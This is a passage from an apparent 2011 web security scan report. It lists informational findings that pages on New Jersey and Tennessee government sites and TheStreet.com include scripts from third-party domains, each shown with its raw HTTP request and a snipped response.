Content-Type: text/html;charset=utf-8
Content-Length: 35112


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>
   
   
<title>Minnesota North Star
...[SNIP]...
<link rel="stylesheet" href="http://www.state.mn.us/mn/css/main.css" type="text/css" id="main">


   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
   </script>
...[SNIP]...

20.166. http://www.state.nj.us/education/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /education/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /education/ HTTP/1.1
Host: www.state.nj.us
Proxy-Connection: keep-alive
Referer: http://nj.gov/nj/safety/internet/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 30 Apr 2011 00:40:59 GMT
Content-length: 16396
Content-type: text/html
Last-modified: Thu, 28 Apr 2011 14:38:08 GMT
Etag: "400c-4db97bd0"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="En">

<head>

<meta http-eq
...[SNIP]...
<!-- include jQuery library -->
<script type="text/javascript"
src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.5.min.js">
</script>
...[SNIP]...
<!-- tabbed content library -->
<script src="http://cdn.jquerytools.org/1.2.5/full/jquery.tools.min.js"></script>
...[SNIP]...

20.167. http://www.state.nj.us/education/parents/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /education/parents/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /education/parents/ HTTP/1.1
Host: www.state.nj.us
Proxy-Connection: keep-alive
Referer: http://www.state.nj.us/education/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 30 Apr 2011 00:45:00 GMT
Content-length: 17786
Content-type: text/html
Last-modified: Thu, 28 Apr 2011 15:01:54 GMT
Etag: "457a-4db98162"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="En"><!-- #BeginTemplate "/T
...[SNIP]...
<!-- tabbed content library -->
<script src="http://cdn.jquerytools.org/1.2.5/full/jquery.tools.min.js"></script>
...[SNIP]...

20.168. https://www.tennesseeanytime.org/biztax/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tennesseeanytime.org
Path:   /biztax/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /biztax/ HTTP/1.1
Host: www.tennesseeanytime.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:58:45 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAvRmvonumlTAW8d8m82xewxQF1FeBydXy7UHGBlNsdFbv9KiZDBTWEauWy_nRs3RVKVIj9d6OkJPN3w"></script>
...[SNIP]...
<li><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=53c584b0-e5ea-446d-83bc-544476c174c5&amp;type=website&amp;buttonText=Share%20This&amp;post_services=email%2Cdigg%2Clinkedin%2Cfacebook%2Cdelicious%2Cstumbleupon%2Ctwitter%2Creddit%2Cwindows_live%2Cnewsvine%2Ctwine%2Cmyspace%2Cgbuzz%2Csms%2Cgoogle_bmarks%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress"></script>
...[SNIP]...

20.169. https://www.tennesseeanytime.org/paams-app/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tennesseeanytime.org
Path:   /paams-app/index.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /paams-app/index.htm HTTP/1.1
Host: www.tennesseeanytime.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:58:48 GMT
Server: Resin/3.0.17
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: JSESSIONID=au9PJ-Uy5Bf7XJ6J_s; path=/
Connection: close
Content-Length: 3269


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin tem
...[SNIP]...
<p id="verisign"><script src="https://seal.verisign.com/getseal?host_name=www.tennesseeanytime.org&size=S&use_flash=NO&use_transparent=YES&lang=en"></script>
...[SNIP]...

20.170. https://www.tennesseeanytime.org/pmnout/notice/listByMonth  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tennesseeanytime.org
Path:   /pmnout/notice/listByMonth

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pmnout/notice/listByMonth?year=2011&month=4&day=29 HTTP/1.1
Host: www.tennesseeanytime.org
Connection: keep-alive
Referer: https://www.tennesseeanytime.org/biztax/
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ECmL1dTx_a79PJ6J_s; __unam=53ea465-12fa3eacf85-221b441d-1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:59:07 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAvRmvonumlTAW8d8m82xewxQF1FeBydXy7UHGBlNsdFbv9KiZDBTWEauWy_nRs3RVKVIj9d6OkJPN3w"></script>
...[SNIP]...
<li><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=53c584b0-e5ea-446d-83bc-544476c174c5&amp;type=website&amp;buttonText=Share%20This&amp;post_services=email%2Cdigg%2Clinkedin%2Cfacebook%2Cdelicious%2Cstumbleupon%2Ctwitter%2Creddit%2Cwindows_live%2Cnewsvine%2Ctwine%2Cmyspace%2Cgbuzz%2Csms%2Cgoogle_bmarks%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress"></script>
...[SNIP]...

20.171. http://www.thestreet.com/story/11081894/1/netflixs-rising-stock-defies-growing-risks.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thestreet.com
Path:   /story/11081894/1/netflixs-rising-stock-defies-growing-risks.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /story/11081894/1/netflixs-rising-stock-defies-growing-risks.html HTTP/1.1
Host: www.thestreet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:37:28 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=300, s-maxage=300, must-revalidate, proxy-revalidate
Expires: Sat, 30 Apr 2011 12:42:28 GMT
Content-Type: text/html;charset=ISO-8859-1
Age: 195
Content-Length: 83905
X-Cache: HIT from psquid01.dc.thestreet.com
X-Cache-Lookup: HIT from psquid01.dc.thestreet.com:80
Via: 1.0 psquid01.dc.thestreet.com:80 (squid)
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Netflix's Rising Stock Defies Growing Risks - TheStreet</title>

...[SNIP]...
<!-- Combo-handled YUI CSS files: -->
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0r4/build/utilities/utilities.js&2.8.0r4/build/datasource/datasource-min.js&2.8.0r4/build/autocomplete/autocomplete-min.js&2.8.0r4/build/container/container_core-min.js&2.8.0r4/build/cookie/cookie-min.js&2.8.0r4/build/paginator/paginator-min.js&2.8.0r4/build/datatable/datatable-min.js&2.8.0r4/build/json/json-min.js"></script><!-- Combo-handled YUI JS files: -->
<script type="text/javascript" src="http://js.thestreet-static.com/files/tsc/v2008/js/_1304024460100/min/ads/adplacer.js"></script>
<script type="text/javascript" src="http://js.thestreet-static.com/files/tsc/v2008/js/_1304024460100/min/combined.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://css.thestreet-static.com/files/tsc/v2008/css/_1304024460100/min/story_optimized.css" />
       <script type="text/javascript" src="http://js.thestreet-static.com/files/tsc/v2008/js/_1304024460100/min/pages/story.js"></script>
...[SNIP]...
<!-- IE8 Compatability mode -->

<script type="text/javascript" src="http://js.thestreet-static.com/files/tsc/v2008/js/_1304024460100/min/disqusCommentCount.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<!-- revenue science (audience science) -->
<SCRIPT LANGUAGE='JavaScript1.2' SRC='http://js.revsci.net/gateway/gw.js?csid=G05524' TYPE='text/javascript'></SCRIPT>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<!--/DO NOT REMOVE/-->


<script type="text/javascript" src="http://js.thestreet-static.com/files/tsc/v2008/js/_1304024460100/min/combined-bottom.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://embed.onespot.com/javascripts/nextclick/thestreet/builder.min.js">
</script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://js.thestreet-static.com/files/tsc/v2008/js/_1304024460100/min/ads/openxPlacer.js"></script>


<div id="lazyLoadedObjects" style="visibility:hidden;">

<script type="text/javascript" src="http://cdn.wibiya.com/Toolbars/dir_0388/Toolbar_388288/Loader_388288.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.172. http://www.tn.gov/bopp/bopp_bo_contents.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /bopp/bopp_bo_contents.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bopp/bopp_bo_contents.htm HTTP/1.1
Host: www.tn.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:40:44 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 21260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">
...[SNIP]...
</form>

<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAvRmvonumlTAW8d8m82xewxQF1FeBydXy7UHGBlNsdFbv9KiZDBTWEauWy_nRs3RVKVIj9d6OkJPN3w"></script>
...[SNIP]...

20.173. http://www.tn.gov/governor/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /governor/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /governor/ HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.1.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:40:10 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 15:25:06 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 20209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAvRmvonumlTAW8d8m82xewxQF1FeBydXy7UHGBlNsdFbv9KiZDBTWEauWy_nRs3RVKVIj9d6OkJPN3w"></script>
...[SNIP]...
<div id="flickr-stream">
<script src="http://badge.dopiaza.org/flickr/badge.js?user=58853148@N02;num=7;sort=date-posted-desc;style=flow-horizontal"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0002/9694.js"> </script>
...[SNIP]...

20.174. http://www.tn.gov/maintenance.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /maintenance.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /maintenance.html HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:58:43 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 27393
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAvRmvonumlTAW8d8m82xewxQF1FeBydXy7UHGBlNsdFbv9KiZDBTWEauWy_nRs3RVKVIj9d6OkJPN3w"></script>
...[SNIP]...
<li><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=53c584b0-e5ea-446d-83bc-544476c174c5&amp;type=website&amp;buttonText=Share%20This&amp;post_services=email%2Cdigg%2Clinkedin%2Cfacebook%2Cdelicious%2Cstumbleupon%2Ctwitter%2Creddit%2Cwindows_live%2Cnewsvine%2Ctwine%2Cmyspace%2Cgbuzz%2Csms%2Cgoogle_bmarks%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress"></script>
...[SNIP]...

20.175. http://www.tn.gov/revenue/forms/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /revenue/forms/index.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /revenue/forms/index.htm HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
Referer: http://www.tn.gov/revenue/onlinefiling/businesstax/biztaxonlinefiling.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:03:20 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 18:54:25 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 14424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">
...[SNIP]...
</form>

<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAvRmvonumlTAW8d8m82xewxQF1FeBydXy7UHGBlNsdFbv9KiZDBTWEauWy_nRs3RVKVIj9d6OkJPN3w"></script>
...[SNIP]...

20.176. http://www.tn.gov/revenue/onlinefiling/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /revenue/onlinefiling/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /revenue/onlinefiling/ HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
Referer: http://tn.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.1.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:40:11 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 19:09:16 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 16907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">
...[SNIP]...
</form>

<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAvRmvonumlTAW8d8m82xewxQF1FeBydXy7UHGBlNsdFbv9KiZDBTWEauWy_nRs3RVKVIj9d6OkJPN3w"></script>
...[SNIP]...

20.177. http://www.tn.gov/revenue/onlinefiling/businesstax/biztaxonlinefiling.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /revenue/onlinefiling/businesstax/biztaxonlinefiling.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /revenue/onlinefiling/businesstax/biztaxonlinefiling.htm HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
Referer: http://www.tn.gov/revenue/onlinefiling/businesstax/bustaxefile.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:58:26 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 19:08:45 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 15193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">
...[SNIP]...
</form>

<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAvRmvonumlTAW8d8m82xewxQF1FeBydXy7UHGBlNsdFbv9KiZDBTWEauWy_nRs3RVKVIj9d6OkJPN3w"></script>
...[SNIP]...

20.178. http://www.tn.gov/revenue/onlinefiling/businesstax/biztaxregister.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /revenue/onlinefiling/businesstax/biztaxregister.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /revenue/onlinefiling/businesstax/biztaxregister.htm HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
Referer: http://www.tn.gov/revenue/onlinefiling/onlineregister.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:44:41 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 19:08:45 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 14629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">
...[SNIP]...
</form>

<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAvRmvonumlTAW8d8m82xewxQF1FeBydXy7UHGBlNsdFbv9KiZDBTWEauWy_nRs3RVKVIj9d6OkJPN3w"></script>
...[SNIP]...

20.179. http://www.tn.gov/revenue/onlinefiling/businesstax/bustaxefile.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /revenue/onlinefiling/businesstax/bustaxefile.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /revenue/onlinefiling/businesstax/bustaxefile.htm HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:40:37 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 19:08:45 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 13779

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">
...[SNIP]...
</form>

<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAvRmvonumlTAW8d8m82xewxQF1FeBydXy7UHGBlNsdFbv9KiZDBTWEauWy_nRs3RVKVIj9d6OkJPN3w"></script>
...[SNIP]...

20.180. http://www.tn.gov/revenue/onlinefiling/onlineregister.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /revenue/onlinefiling/onlineregister.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /revenue/onlinefiling/onlineregister.htm HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:40:39 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 19:09:16 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 14076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">
...[SNIP]...
</form>

<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAvRmvonumlTAW8d8m82xewxQF1FeBydXy7UHGBlNsdFbv9KiZDBTWEauWy_nRs3RVKVIj9d6OkJPN3w"></script>
...[SNIP]...

20.181. http://www.tn.gov/revenue/onlinefiling/salesanduse/electronicfiling.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tn.gov
Path:   /revenue/onlinefiling/salesanduse/electronicfiling.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /revenue/onlinefiling/salesanduse/electronicfiling.htm HTTP/1.1
Host: www.tn.gov
Proxy-Connection: keep-alive
Referer: http://www.tn.gov/revenue/onlinefiling/salesanduse/salestaxefile.htm
